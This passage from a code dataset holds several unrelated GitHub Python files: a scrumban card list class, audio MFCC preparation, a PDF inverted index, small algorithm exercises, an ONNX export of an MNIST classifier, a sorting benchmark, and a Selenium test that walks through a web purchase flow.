'+str(numberNeuralNetwork))\n axs[col, row].axis('off')\n # update the colum and row indices of the subplot\n row += 1\n if (row % numrow) == 0:\n col += 1\n row = 0\n if (col % numcol) == 0:\n # subplot cannot hold anymore images so break the loop\n break\n\n \ndef showRandomlySelectedImage(testImage,testLabel):\n #shows a random image from the data set\n imageNum = testLabel.shape\n imageNum = round(random.uniform(0, imageNum[1]))\n dataloader.showImage(testImage[:,imageNum], testLabel[:,imageNum], imageNum)\n return\n","repo_name":"martijneppenga/Machine_learning_introduction","sub_path":"Nielson/NeuralNetworkHandWrittenImage.py","file_name":"NeuralNetworkHandWrittenImage.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30417908275","text":"import os\nimport logging.config\nimport string\nimport random\n\nfrom hashlib import sha1\nfrom collections import deque\nimport datetime\n\nfrom scrumban_board_python.scrumban_board.card import Card\nfrom scrumban_board_python.scrumban_board.terminal_colors import Colors\n\nlogging.config.fileConfig('logging.cfg')\nlogger = logging.getLogger(\"ScrumbanBoard\")\n\n\nclass CardList:\n \"\"\"\n Board contains Cardlists with cards\n\n Example:\n to_do = CardList(\"To-Do\")\n doing = CardList(\"Doing\")\n done = CardList(\"Done\")\n overdue = CardList(\"Overdue\")\n \"\"\"\n\n @staticmethod\n def get_cards(cards):\n new_cards = deque()\n\n if cards is not None:\n if isinstance(cards, Card):\n new_cards.append(cards)\n\n elif isinstance(cards, deque):\n for card in cards:\n if isinstance(card, Card):\n new_cards.append(card)\n\n return new_cards\n\n def __init__(self, title: str,\n cards=None, description: str = None):\n \"\"\"\n Initialising of Cardlist\n\n :param title: cardlist title\n :param cards: deque of cards (or Card)\n :param description: cardlist description\n \"\"\"\n self.title = title\n self.description = description\n\n self.cards = CardList.get_cards(cards)\n\n self.id = self._get_id()\n\n logger.info(\"Cardlist ({}) was created\".format(self.id))\n\n def _get_id(self):\n key = ''.join(\n random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(len(self.title)))\n\n return sha1((\"CardList: \" +\n key + \" \" +\n self.title + \" \" +\n str(datetime.datetime.now())).encode('utf-8')).hexdigest()\n\n def __str__(self):\n cards = [card for card in self.cards]\n\n output = Colors.cardlist_green + \"\"\"\n --- Cardlist ---\n Title: {}\n Description: {}\n ID: {}\n \n Cards: \n {}\n \n ---End Cardlist--\n\"\"\".format(self.title,\n self.description,\n self.id,\n cards) + Colors.end_color\n\n return output\n\n def __repr__(self):\n cards = [card for card in self.cards]\n\n output = Colors.cardlist_green + \"\"\"\n --- Cardlist ---\n Title: {}\n Description: {}\n ID: {}\n \n Cards: \n {}\n \n ---End Cardlist--\n\"\"\".format(self.title,\n self.description,\n self.id,\n cards) + Colors.end_color\n\n return output\n\n def update_cardlist(self, title: str = None, cards: deque = None, description: str = None):\n \"\"\"\n Cardlist updating\n\n :param title: new title\n :param cards: new cards (or Card)\n :param description: new description\n :return:\n \"\"\"\n if title is not None:\n self.title = title\n\n if cards is not None:\n self.cards = CardList.get_cards(cards)\n\n if description is not None:\n self.description = description\n\n logger.info(\"Cardlist ({}) was updated\".format(self.id))\n\n def find_card(self, card_id=None, card_title=None):\n \"\"\"\n Searching card in the cardlist\n\n :param card_id: сard id\n :param card_title: card title\n :return:\n \"\"\"\n if card_id is not None:\n try:\n card = next(card for card in self.cards if card.id == card_id)\n logger.info(\"Card ({}) was found by card_id in Cardlist ({})\".format(card_id,\n self.id))\n\n return card\n except StopIteration:\n logger.info(\"Card ({}) wasn't found by card_id in Cardlist ({})\".format(card_id,\n self.id))\n\n elif card_title is not None:\n try:\n card = next(card for card in self.cards if card.title == card_title)\n logger.info(\"Card ({}) wasn found by card_title in Cardlist ({})\".format(card_title,\n self.id))\n return card\n except StopIteration:\n logger.info(\"Card ({}) wasn't found by card_title in Cardlist ({})\".format(card_title,\n self.id))\n return None\n\n def add_card(self, new_card: Card):\n \"\"\"\n Addind new card\n\n :param new_card: new card\n :return:\n \"\"\"\n duplicate_card = self.find_card(card_id=new_card.id)\n\n if duplicate_card is None:\n self.cards.append(new_card)\n\n logger.info(\"Card ({}) was added in Cardlist ({})\".format(new_card.id,\n self.id))\n\n def remove_card(self, card: Card = None, card_id=None):\n \"\"\"\n Removing card\n\n :param card: Card for removing\n :param card_id: card id for removing\n :return:\n \"\"\"\n if card is not None:\n duplicate_card = self.find_card(card_id=card.id)\n\n if duplicate_card is not None:\n self.cards.remove(card)\n\n logger.info(\"Card ({}) was removed from Cardlist ({})\".format(duplicate_card.id,\n self.id))\n\n elif card_id is not None:\n duplicate_card = self.find_card(card_id=card_id)\n\n if duplicate_card is not None:\n self.cards.remove(duplicate_card)\n\n logger.info(\"Card ({}) was removed from Cardlist ({})\".format(duplicate_card.id,\n self.id))\n\n def change_card_position(self, position: int, card: Card = None, card_id: str = None):\n \"\"\"\n Changing card position in cardlist\n\n :param position: 1, 2 .. n\n :param card: Card\n :param card_id: card id\n :return:\n \"\"\"\n if card is not None:\n duplicate_card = self.find_card(card_id=card.id)\n\n if duplicate_card is not None:\n self.cards.remove(duplicate_card)\n\n real_position = position - 1\n self.cards.insert(real_position, duplicate_card)\n\n logger.info(\"Card ({}) was moved in Cardlist ({}) to position {}\".format(duplicate_card.id,\n self.id,\n real_position))\n\n elif card_id is not None:\n duplicate_card = self.find_card(card_id=card_id)\n\n if duplicate_card is not None:\n self.cards.remove(duplicate_card)\n\n real_position = position - 1\n self.cards.insert(real_position, duplicate_card)\n\n logger.info(\"Card ({}) was moved in Cardlist ({}) to position {}\".format(duplicate_card.id,\n self.id,\n real_position))\n","repo_name":"romamartyanov/Fantastical-Things","sub_path":"scrumban_board_python/scrumban_board/cardlist.py","file_name":"cardlist.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16849782296","text":"import librosa\nimport os\nimport json\n\nDATASET_PATH = \"dataset\"\nJSON_PATH = \"data.json\"\nSAMPLES_TO_CONSIDER = 22050\n\n\ndef prepare_dataset(dataset_path, json_path, n_mfcc=13, hop_length=512, n_fft=2048):\n # data dictionary\n data = {\n \"mappings\": [],\n \"labels\": [],\n \"MFCCs\": [],\n \"files\": []\n }\n\n # loop through all the sub dirs:\n for i, (dir_path, dir_names, file_names) in enumerate(os.walk(dataset_path)):\n if dir_path is not dataset_path:\n category_name = dir_path.split(os.path.sep)[-1]\n print(f\"Processsing {category_name}\")\n data[\"mappings\"].append(category_name)\n\n for f in file_names:\n file_path = os.path.sep.join([dir_path, f])\n\n signal, sample_rate = librosa.load(file_path)\n\n if len(signal) >= SAMPLES_TO_CONSIDER:\n # ensure one second long signal\n signal = signal[:SAMPLES_TO_CONSIDER]\n\n # extract the MFCCs\n MFCCs = librosa.feature.mfcc(signal, n_mfcc=n_mfcc, hop_length=hop_length, n_fft=n_fft)\n\n # store data\n data[\"labels\"].append(i-1)\n data[\"MFCCs\"].append(MFCCs.T.tolist())\n data[\"files\"].append(file_path)\n\n print(f\"{file_path}: {i-1}\")\n\n # store in json file\n with open(json_path, \"w\") as fp:\n json.dump(data, fp, indent=4)\n\n\nif __name__ == \"__main__\":\n prepare_dataset(DATASET_PATH, JSON_PATH)\n","repo_name":"machingclee/deep-learning-study","sub_path":"2021-04-09-speech-recognition-deployment/local/prepare_model/prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38992046613","text":"import string\nimport PyPDF2\nimport time\n#Main class\nclass Index(object):\n\t#Constructor\n\tdef __init__(self):\n\t\tself.inverted_index = {}\n\t#Formatting the data \n\tdef construct(self,file):\n\t\t# creating a pdf file object\n\t\tpdfFileObj = open(file, 'rb')\n \n\t\t# creating a pdf reader object\n\t\tpdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n \n\t\t# creating a page object\n\t\tfor i in range(pdfReader.numPages):\n\n\t\t\tpageObj = pdfReader.getPage(i)\n \n\t\t# extracting text from page\n\t\t\tx = pageObj.extractText()\n\t\t\tx = x.split()\n\t\t\t\n\t\t\tself.insert_tokens(i + 1,x)\n\t\t# closing the pdf file object\n\t\tpdfFileObj.close()\n\n\t\tprint(\"Successfully Inserted!!!!\")\n\t#inserting each word\n\tdef insert_tokens(self,pageno,tokens):\n\t\tfor token in tokens:\n\t\t\ttoken = token.lower()\n\t\t\tif not token in bad: \n\t\t\t\tif not token in self.inverted_index:\n\t\t\t\t\tself.inverted_index[token] = {}\n\t\t\t\t\tself.inverted_index[token][pageno] = 0\n\t\t\t\tif not pageno in self.inverted_index[token]:\n\t\t\t\t\tself.inverted_index[token][pageno] = 0\n\t\t\t\tself.inverted_index[token][pageno] += 1\n\t\t\telse:\n\t\t\t\tcontinue\n\t#O(1) search\n\tdef search(self,token):\n\t\tif token in self.inverted_index:\n\t\t\tprint(\"PageNumber | Frequency:\")\n\t\t\treturn self.inverted_index[token]\n\t\telse:\t\n\t\t\treturn None\ndef display(x):\n\ttry:\n\t\tfor i in x:\n\t\t\tprint(i,\" | \",x[i])\n\texcept Exception as e:\n\t\tprint(\"Word not Found\")\nbad = frozenset([\n'a', 'about', 'across', 'after', 'afterwards', 'again', \n'against', 'all', 'almost', 'alone', 'along', 'already', 'also','although',\n'always','am','among', 'amongst', 'amoungst', 'amount', 'an', 'and', 'another',\n'any','anyhow','anyone','anything','anyway', 'anywhere', 'are', 'around', 'as',\n'at', 'back','be','became', 'because','become','becomes', 'becoming', 'been', \n'before', 'beforehand', 'behind', 'being', 'below', 'beside', 'besides', \n'between', 'beyond', 'bill', 'both', 'bottom','but', 'by', 'call', 'can', \n'cannot', 'cant', 'co', 'con', 'could', 'couldnt', 'cry', 'de', 'describe', \n'detail', 'do', 'done', 'down', 'due', 'during', 'each', 'eg', 'eight', \n'either', 'eleven','else', 'elsewhere', 'empty', 'enough', 'etc', 'even', \n'ever', 'every', 'everyone', 'everything', 'everywhere', 'except', 'few', \n'fifteen', 'fify', 'fill', 'find', 'fire', 'first', 'five', 'for', 'former', \n'formerly', 'forty', 'found', 'four', 'from', 'front', 'full', 'further', 'get',\n'give', 'go', 'had', 'has', 'hasnt', 'have', 'he', 'hence', 'her', 'here', \n'hereafter', 'hereby', 'herein', 'hereupon', 'hers', 'herself', 'him', \n'himself', 'his', 'how', 'however', 'hundred', 'ie', 'if', 'in', 'inc', \n'indeed', 'interest', 'into', 'is', 'it', 'its', 'itself', 'keep', 'last', \n'latter', 'latterly', 'least', 'less', 'ltd', 'made', 'many', 'may', 'me', \n'meanwhile', 'might', 'mill', 'mine', 'more', 'moreover', 'most', 'mostly', \n'move', 'much', 'must', 'my', 'myself', 'name', 'namely', 'neither', 'never', \n'nevertheless', 'next', 'nine', 'no', 'nobody', 'none', 'noone', 'nor', 'not', \n'nothing', 'now', 'nowhere', 'of', 'off', 'often', 'on', 'once', 'one', 'only',\n'onto', 'or', 'other', 'others', 'otherwise', 'our', 'ours', 'ourselves', 'out',\n'over', 'own','part', 'per', 'perhaps', 'please', 'put', 'rather', 're', 'same',\n'see', 'seem', 'seemed', 'seeming', 'seems', 'serious', 'several', 'she', \n'should', 'show', 'side', 'since', 'sincere', 'six', 'sixty', 'so', 'some', \n'somehow', 'someone', 'something', 'sometime', 'sometimes', 'somewhere', \n'still', 'such', 'system', 'take', 'ten', 'than', 'that', 'the', 'their', \n'them', 'themselves', 'then', 'thence', 'there', 'thereafter', 'thereby', \n'therefore', 'therein', 'thereupon', 'these', 'they', 'thickv', 'thin', 'third',\n'this', 'those', 'though', 'three', 'through', 'throughout', 'thru', 'thus', \n'to', 'together', 'too', 'top', 'toward', 'towards', 'twelve', 'twenty', 'two', \n'un', 'under', 'until', 'up', 'upon', 'us', 'very', 'via', 'was', 'we', 'well', \n'were', 'what', 'whatever', 'when', 'whence', 'whenever', 'where', 'whereafter',\n'whereas', 'whereby', 'wherein', 'whereupon', 'wherever', 'whether', 'which', \n'while', 'whither', 'who', 'whoever', 'whole', 'whom', 'whose', 'why', 'will', \n'with', 'within', 'without', 'would', 'yet', 'you', 'your', 'yours', 'yourself',\n'yourselves', 'the'])\n\nv=time.clock()\ni=Index() \ni.construct(\"t.pdf\")\nprint(time.clock()-v)\nprint(\"Enter word to be searched!\")\nword = input().lower()\nv=time.clock()\ndisplay(i.search(word))\nprint(time.clock()-v)","repo_name":"Tilak-Shenoy/Encyclopedia-Appendix","sub_path":"invertedindex.py","file_name":"invertedindex.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20259015666","text":"# Anton and Danik\n# https://codeforces.com/contest/734/problem/A\n#\n# Author: eloyhz\n# Date: Aug/25/2020\n\n\nif __name__ == '__main__':\n\tn = int(input())\n\tgames = input()\n\tanton = 0\n\tdanik = 0\n\tfor player in games:\n\t\tif player == 'A':\n\t\t\tanton += 1\n\t\telse:\n\t\t\tdanik += 1\n\tif anton > danik:\n\t\tprint('Anton')\n\telif danik > anton:\n\t\tprint('Danik')\n\telse:\n\t\tprint('Friendship')\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"codeforces/training/CF734-D2-A.py","file_name":"CF734-D2-A.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14674903850","text":"from sklearn.datasets import fetch_openml\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom skl2onnx import convert_sklearn\nfrom skl2onnx.common.data_types import FloatTensorType\n\n# データの準備\nx, y = fetch_openml(\"mnist_784\", version=1, return_X_y=True, as_frame=False)\nprint(\"mnist comp\")\n\nx = x[:700]\ny = y[:700]\n\n# データの分割\nx_train, x_test, y_train, y_test = train_test_split(\n x, y, test_size=0.2, random_state=123\n)\n\n# 学習\nmodel = LogisticRegression(max_iter=1000)\nmodel.fit(x_train, y_train)\n\n# 精度確認\ny_pred = model.predict(x_test)\naccuracy = accuracy_score(y_test, y_pred)\nprint(f\"accuracy: {accuracy}\")\n\n# モデルファイル名の定義\nmodel_file = \"model.onnx\"\n\n# 入力データの形式を指定(mnistは28*28=768のデータである)\ninital_types = [(\"float_input\", FloatTensorType([None, 28*28]))]\n\n# モデルを変換する処理(optionで出力結果の形式を指定している)\nonnx = convert_sklearn(model, initial_types=inital_types, options={\"zipmap\": False})\n\nwith open(model_file, \"wb\") as f:\n f.write(onnx.SerializeToString())\n \nprint(f\"{model_file} exported\")","repo_name":"wtaru/python-web-app-freehand","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25058527055","text":"def Ispalindrome(str1):\n \n if str1 == '':\n return False\n slen = len(str1)//2+1\n \n for idx in range (slen):\n if str1[idx] != str1[-1-idx]:\n return False\n \n return True\n \ndef solution(s):\n N = len(s)\n Max = 0\n for lt in range (N):\n for rt in range (lt,N+1):\n if Ispalindrome(s[lt:rt]) and Max < len(s[lt:rt]):\n Max = len(s[lt:rt])\n return(Max)\n \n\n\n\nsolution(\"abcdcba\") ## 7\n","repo_name":"aver1001/github-practice","sub_path":"programmers/Level 3/가장 긴 팰린드롬/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27833286328","text":"import time\nimport random\n#%matplotlib inline\nimport matplotlib.pyplot as plt\n\ndef random_list(number):\n figure_list = []\n for n in range(number):\n value = random.randint(0, maxvalue)\n figure_list.append(value)\n return figure_list\n \ndef insertion_sort(a):\n for j in range(1, len(a)):\n key = a[j]\n k = j - 1\n while k >= 0 and a[k] > key:\n a[k + 1] = a[k]\n k = k - 1\n a[k + 1] = key\n\ndef mergesort(a,p,r):\n if p < r:\n q = (p+r) // 2\n mergesort(a,p,q)\n mergesort(a, q+1,r)\n\n n1 = q-p+1\n n2 = r-q\n L=[]\n R=[]\n for i in range(0,n1):\n L.append(a[p+i])\n for j in range(0,n2):\n R.append(a[q+j+1])\n L.append(1000000)\n R.append(1000000)\n i = 0\n j = 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n a[k] = L[i]\n i += 1\n else:\n a[k] = R[j]\n j += 1\n\nmaxvalue = 999999\nx = [500, 1000, 2000, 5000, 10000, 15000]\ny1 = []\ny2 = []\nfor figure in x:\n a = random_list(figure)\n start_time = time.process_time()\n insertion_sort(a)\n end_time = time.process_time()\n start_time2 = time.process_time()\n mergesort(a,0,len(a)-1)\n end_time2 = time.process_time()\n y1.append(end_time-start_time)\n y2.append(end_time2-start_time2)\n\nplt.title(\"Time\")\nplt.ylabel(\"Time[s]\")\nplt.xlabel(\"Number of data\")\nplt.plot(x, y1, marker=\"o\", label =\"insertion_sort\")\nplt.plot(x, y2, marker=\"x\", label=\"mergesort\")\nplt.legend()\nplt.show()","repo_name":"2basaa/python","sub_path":".vscode/algorithm_kadai/kadai5-2.py","file_name":"kadai5-2.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34682343685","text":"import os, sys, json\r\n\r\nparentddir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))\r\nprint(\"Current Directory\",parentddir)\r\n\r\npov_automation= os.path.dirname(parentddir)\r\nprint(pov_automation)\r\ncommon_direc_path = os.path.join(pov_automation, 'common')\r\nprint(common_direc_path)\r\nhelpers_direc_path = os.path.join(pov_automation, 'pyscripts/helpers')\r\nprint(helpers_direc_path)\r\n\r\nfrom selenium import webdriver\r\nimport sys\r\nsys.path.insert(0, common_direc_path)\r\nsys.path.insert(0, helpers_direc_path)\r\nimport common_call\r\nimport functional_common_call\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nfrom browserstack.local import Local\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\nlogin_element_sheet,mfa_element_sheet,Global_Search_element_sheet,Member_Search_element_sheet,User_Search_element_sheet,adhoc_adviser_charge_element_sheet,manage_investment_income_element_sheet,equity_trading_element_sheet,viewquote_element_sheet,Search_element_sheet,Quotes_applications_element_sheet=common_call.get_element_sheet()\r\n\r\njira_id,Username,Password,name,env,device,platform,user_type=common_call.auto_fun('val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page')\r\nBROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,caps,web_address,op_filename,input_file,output_file=common_call.fun(platform,device,env,name,jira_id,user_type)\r\n\r\n\r\n#------------------------------------------------------#\r\n# THE TEST TO BE RUN PARALLELY GOES HERE\r\ndriver = webdriver.Remote(command_executor='https://%s:%s@hub.browserstack.com/wd/hub' % (BROWSERSTACK_USERNAME, BROWSERSTACK_ACCESS_KEY),desired_capabilities=caps)\r\n#common_call.connect_BS_hub(BROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,caps)\r\n\r\n\r\nfunctional_common_call.maximize_driver_window(driver)\r\ninput_df= pd.read_csv(input_file+\"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page_input.csv\",encoding='cp1252')\r\nprint(input_df)\r\n\r\ndef val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page():\r\n\tdriver.implicitly_wait(10)\r\n\tsearch_result=[]\r\n\tdriver.maximize_window()\r\n\r\n\t#Product Select (SIPP Drawdown Transfer )\r\n\r\n\t#Click on the search button\r\n\tSearchbutton=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[118,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Searchbutton);\r\n\tcommon_call.highlight_element(Searchbutton, 2, 5)\r\n\tSearchbutton.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Enter values in the input bar\r\n\tInput=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[119,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Input);\r\n\tcommon_call.highlight_element(Input, 2, 5)\r\n\tInput.click()\r\n\tInput.send_keys('20486569')\r\n\ttime.sleep(3)\r\n\r\n\t#Click on the submit button\r\n\tSubmit=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[120,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Submit);\r\n\tcommon_call.highlight_element(Submit, 2, 5)\r\n\tSubmit.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Click on the client ID\r\n\tClientname=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[139,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Clientname);\r\n\tcommon_call.highlight_element(Clientname, 2, 5)\r\n\tprint(Clientname.text)\r\n\tClientname.click()\r\n\ttime.sleep(20)\r\n\r\n\t#Buy product button click\r\n\tBuyproduct=driver.find_element(by=By.LINK_TEXT, value=('Buy product'))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Buyproduct);\r\n\tcommon_call.highlight_element(Buyproduct, 2, 5)\r\n\tprint(Buyproduct.text)\r\n\tBuyproduct.click()\r\n\ttime.sleep(3)\r\n\r\n\t#AOR radio Button Select\r\n\tdriver.implicitly_wait(30)\r\n\tRadio_Button=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[22,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Radio_Button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest'):\r\n\tcommon_call.highlight_element(Radio_Button, 2, 5)\r\n\tRadio_Button.click()\r\n\r\n\r\n\t#Click Start Button\r\n\tStart_Button=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[24,'accessbility_id']))\r\n\tcommon_call.highlight_element(Start_Button, 2, 5)\r\n\ttime.sleep(5)\r\n\tStart_Button.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Uk resident yes button\r\n\tresidentradiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[125,'accessbility_id']))\r\n\tresidentradiobutton.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Adviser button click\r\n\tadviseradiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[83,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", adviseradiobutton);\r\n\tcommon_call.highlight_element(adviseradiobutton, 2, 5)\r\n\ttime.sleep(3)\r\n\tadviseradiobutton.click()\r\n\ttime.sleep(3)\r\n\r\n\ttime.sleep(3)\r\n\t#Product Select\r\n\tproductadiobutton =driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[127,'accessbility_id']))\r\n\tfor product in productadiobutton:\r\n\t\tprint(product.text)\r\n\r\n\ttime.sleep(9)\r\n\r\n\tproductadiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[31,'accessbility_id']))\r\n\ttime.sleep(5)\r\n\t#if(device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(productadiobutton, 2, 5)\r\n\tprint(productadiobutton.text)\r\n\tproductadiobutton.click()\r\n\r\n\ttime.sleep(9)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#User Info\r\n\tUserInfo=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[39,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(UserInfo, 2, 5)\r\n\tprint(UserInfo.text)\r\n\r\n\t#HeDer Money In And Out\r\n\tHeardr=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[40,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Heardr, 2, 5)\r\n\tprint(Heardr.text)\r\n\r\n\t#No Button\r\n\tNo=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[30,'accessbility_id']))\r\n\tfor nobutton in No:\r\n\t\tif nobutton.text=='No':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(nobutton, 2, 5)\r\n\t\tprint(nobutton.text)\r\n\t\tnobutton.click()\r\n\r\n\ttime.sleep(5)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\tDDERROR=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[43,'accessbility_id']))\r\n\tprint(DDERROR.text)\r\n\r\n\r\n\t#Drawdown Arrangements Yes\r\n\r\n\tYes=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[73,'accessbility_id']))\r\n\tfor yesbutton in Yes:\r\n\t\tif yesbutton.text=='Yes':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(yesbutton, 2, 5)\r\n\t\t\tprint(yesbutton.text)\r\n\t\t\tyesbutton.click()\r\n\ttime.sleep(5)\r\n\r\n\t#Add tranche\r\n\tAddtranche=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[76,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Addtranche, 2, 5)\r\n\ttime.sleep(5)\r\n\tprint(Addtranche.text)\r\n\tAddtranche.click()\r\n\r\n\tAddtrancheinput=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[77,'accessbility_id']))\r\n\tAddtrancheinput.click()\r\n\tAddtrancheinput.send_keys(\"1111\")\r\n\r\n\t#income selection\r\n\tNo=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[52,'accessbility_id']))\r\n\tfor Nobutton in No:\r\n\t\tif Nobutton.text=='No':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(Nobutton, 2, 5)\r\n\t\t\tprint(Nobutton.text)\r\n\t\t\tNobutton.click()\r\n\ttime.sleep(5)\r\n\tSave=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[85,'accessbility_id']))\r\n\tSave.click()\r\n\r\n\t#Enter value to product refrence\r\n\r\n\tProductrefrence=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[49,'accessbility_id']))\r\n\tProductrefrence.click()\r\n\tProductrefrence.send_keys('Asish')\r\n\r\n\t#Transfer Provider\r\n\tAddTransfer=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[63,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\",AddTransfer)\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(AddTransfer, 2, 5)\r\n\tprint(AddTransfer.text)\r\n\tAddTransfer.click()\r\n\r\n\t#Transfer provider Box\r\n\tBox=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[74,'accessbility_id']))\r\n\tBox.send_keys('w')\r\n\r\n\tTransferprovider_dropdown=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[75,'accessbility_id']))\r\n\r\n\tfor TP in Transferprovider_dropdown:\r\n\t\tcommon_call.highlight_element(TP, 2, 5)\r\n\t\tprint(TP.text)\r\n\t\t#search_result.append(TP.text)\r\n\t\tTP.click()\r\n\t\tbreak\r\n\t\ttime.sleep(5)\r\n\r\n\tSave=driver.find_element(by=By.XPATH, 